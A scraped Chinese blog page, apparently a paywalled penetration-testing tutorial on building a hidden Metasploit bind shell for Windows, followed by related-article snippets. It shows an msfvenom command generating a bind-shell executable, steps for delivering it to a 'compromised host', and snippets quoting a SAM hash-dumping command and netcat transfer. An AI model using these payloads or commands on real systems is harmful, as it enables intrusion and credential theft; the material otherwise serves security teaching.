Metasploit 通过隐藏 Bind Shell,只允许指定目标接收反弹 Shell

最新推荐文章于 2025-02-15 10:59:59 发布
最新推荐文章于 2025-02-15 10:59:59 发布
阅读量450 收藏 2
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40602516/article/details/115015283
本文介绍了如何使用 Metasploit 创建一个隐藏的正向 Bind Shell,该 Shell 只允许指定的目标机器接收反弹 Shell。通过 MSFvenom 生成 Windows 正向 shell,然后利用 Python3 HTTP 服务器在目标机器上部署并执行。当黑客通过 Telnet 在指定端口连接时,仅目标机器能反弹一个 cmd shell,提高了渗透测试的安全性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在内网渗透中,正向 bind shell 会经常用到,正反向shell:反向 reverse shell 就是通过我们监听,目标肉鸡运行 exe 我们就会收到一个反弹 shell;而正向就是目标肉鸡运行 exe,我们去连接肉鸡。

 

首先通过 MSF 生成一个正向 shell:

msfvenom -p windows/shell_hidden_bind_tcp LPORT=8889 AHOST=192.168.84.128 -f exe > bind_shell.exe

使用python3开启一个自带的http服务器:

再在肉鸡访问hacker的8000端口将exe下载后运行:

 

最低0.47元/天 解锁文章

200万优质内容无限畅学
反弹shell流量分析与检测
欢迎光临
08-30 1549
常用的隧道技术:网络层:ipv6、Icmp、greIPv6隧道:将ipv6报文放入ipv4作为载体进行传输,工具:socat、6tunnelICMP隧道:将数据放入ping包中进行传输,工具:icmpsh、PingTunnelGRE隧道传输层:TCP隧道、UDP隧道、常规的端口转发。端口转发:没有端口限制就正常的内网端口转发,有端口限制就本地端口转发 工具:lcx、nc、powercatSOCKS代理:SOCKS代理可以理解为增强版的lcx。
msf反弹php shell,msf构造出shell反弹脚本
weixin_39669769的博客
03-22 912
Liunx下能够构造shell反弹脚本有很多常见的如bash,netcat、socat以及各种语言,当然今天主要内容是详细介绍msfvenom如何生成shell脚本。正文metasploit-framework介绍Metasploit项目是一个旨在提供安全漏洞信息计算机安全项目,可以协助安全工程师进行渗透测试(penetration testing)及入侵检测系统签名开发。Metasploit项目...
Bindshell原理
weixin_33752045的博客
06-05 1307
原理很简单就是创建一个进程打开一个终端然后标准输入输出句柄重定位到一个网络端口c版 win系统 #include<winsock2.h> #pragma comment(lib,"Ws2_32.lib") int _tmain(int argc, TCHAR* argv[]) { //1.初始化一个sock服务 WSADATA stWSA; WSAStartup...
Java bindshell/reverseshell pakage
cnbird's blog
12-22 680
Java bindshell/reverseshell pakage
一个bindshell的代码
Yatere的天平秤
02-05 1192
/* * Win32 RootKit - cmd.exe remote shell backdoor * (c) 2003 Christophe Devine * Distributed for educational purposes only! * * Before running ntbindshell.exe, rename it to * "rsmss.exe" and c
Shell内建命令之bind
荣耀之路
03-13 1156
Shell内建命令之bind
kali使用Metasploit Framework(msf)获取shell
Mrw的博客
04-05 2934
简介 Metasploit Framework是一个编写,测试和使用exploit代码的完善环境。这个环境为渗透测试,shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Ruby编程语言编写的,并带有由C语言,汇编程序和Python编写的可选组件。 Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插...
Excel宏反弹shell+BT渗透常用命令+c
m0_60894143的博客
08-21 591
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u只保留可以在linux下运行的代码。samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt 备份sam文件。cp /pentest/windows-binaries/tools/nc.exe /tmp/传递到tftp上。
3.7 bindshell编写
qq_55202378的博客
08-22 830
bindshell
shellcode中变形bindshell的实现
whatday的专栏
09-28 963
最近学习《0day安全》一书 记录一下调试编码过程 书中环境XP VC6 本机的环境是server 2008 r2 x64  编译环境是vs2013    第一步: 首先是写一个win c版本的bindshell 代码如下: #include&lt;winsock2.h&gt; #pragma comment(lib,"Ws2_32.lib") void main() { //1...
linux漏洞Bind Shell Backdoor Detection
arissa666的博客
07-06 413
Bind Shell Backdoor Detection利用。telnet 主机地址 1524。
使用 backdoor 工具注入ShellCode
weixin_30790841的博客
08-12 574
backdoor-factory 顾名思义,直接翻译过来就是后门工厂的意思。其利用打补丁的方式编码加密PE文件,可以轻松的生成win32PE后门程序,从而帮助我们绕过一些防病毒软件的查杀,达到一定得免杀效果,利用该工具,攻击者可以在不破坏原有可执行文件的功能的前提下,在文件的代码裂隙中插入恶意代码Shellcode。当可执行文件被执行后,就可以触发恶意代码。Backdoor Factor...
Pwncat --- 一款功能强大的反向Shell&Bindshell处理工具
2301_79949226的博客
01-04 991
本文主要阐释了一款功能强大的类似Netcat的Pwncat工具,希望对你有所帮助。。
Shell高手进阶:bind命令的魔法】
最新发布
lu_pete的博客
02-15 307
bind 通过灵活定制键盘映射,让命令行操作如虎添翼!
Metasploit 快速入门(三)—— 服务端漏洞利用
gclome的博客
07-22 2741
今天的这篇文章是对Metasploit 快速入门(三)—— 服务端漏洞利用这篇文章的复现。有些地方由于环境配不好,就直接把原文的图copy过来了! 温馨提示:靶机用自己的虚拟机就好,如果不想搞坏你的虚拟机,记得加快照、加快照、快照 原创:合天网安实验室合天智汇 在前面,我们学习了 Metasploit快速入门(一) Metasploit快速入门(二) Metasploit 快速入门(二)——信息收集和扫描-续 在本章中,我们将学习以下内容 1、攻击Linux服务器 2、SQL注入攻击 3、shell类型
[原创]K8 MSF Bind Shell TCP 连接工具
weixin_30562507的博客
01-12 391
工具:K8_MSFBindShellClient_20170524[K.8]编译:自己查壳组织:K8搞基大队[K8team]作者:K8拉登哥哥博客:http://qqhack8.blog.163.com发布:2017/5/241:51:02简介:MSF Bind Shell TCP Client 无需安装MSF环境,连接msf绑定shell图片: 功能:下载地址文件...
ARM汇编之TCP Bind Shell
github_38641765的博客
12-12 568
bind shell 作为一个bind shell,也就是在服务器上运行的shellcode,等待hacker去主动连接,所以它的主要工作就是监听固定端口,等待外部连接即可 C代码(Linux,都是使用man命令查询的命令介绍) 指令 介绍 socket int socket(int domain, int type, int ...
golang通过websocket实现ssh、telnet、正向shell(bind shell)终端交互
u013071014的博客
05-06 3668
1. gin框架注册路由 func init() { routerCheckRole = append(routerCheckRole, registerTgWsRouter) } // 需认证的路由代码 func registerTgWsRouter(v1 *gin.RouterGroup, authMiddleware *jwt.GinJWTMiddleware) { api := apis.TgWs{} r := v1.Group("") { // 协议、IP、端口 r.GET("/
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值